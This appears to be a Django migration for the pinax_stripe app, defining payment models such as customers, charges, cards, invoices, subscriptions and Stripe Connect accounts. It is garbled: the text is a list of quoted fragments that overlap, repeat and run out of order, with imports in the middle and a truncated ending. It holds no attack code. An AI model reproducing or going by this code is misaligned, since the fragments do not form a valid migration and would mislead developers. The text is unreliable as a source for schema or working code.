models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)),", "models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver',", "models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent',", "('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={", "to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem',", "('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name',", "'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True,", "to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata',", "}, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country',", "'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months',", "to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32,", "on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False,", "jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ],", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city',", "('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2,", "to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice',", "models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged',", "('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure',", "('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual',", "serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True,", "('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)),", "('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group',", "null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions',", "models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)),", "('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval',", "('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks',", "to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True,", "max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id',", "False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False,", "name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True,", "models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract':", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode',", "('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3,", "('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status',", "'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "import unicode_literals from decimal import Decimal from django.conf import settings from django.db import", "choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)),", "models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan',", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription',", "('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'),", "), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True,", "('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True,", "('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed',", "('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True,", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor',", "}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False,", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)),", "models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'),", "related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ),", "models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check',", "max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)),", "null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration',", "import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True", "migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd',", "models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[", "through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField(", "('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country',", "decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True,", "models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True,", "serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True,", "on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id',", "null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by',", "migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)),", "models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer',", "('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract':", "('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[", "('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()),", "field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'),", "models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency',", "('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type',", "__future__ import unicode_literals from decimal import Decimal from django.conf import settings from django.db", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver',", "max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')),", "models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days',", "models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True,", "('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand',", "null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices',", "field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]), ),", "models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)),", "('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id',", "('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)),", "related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[", "Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel(", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2,", "default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None,", "migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "null=True)), ('valid', 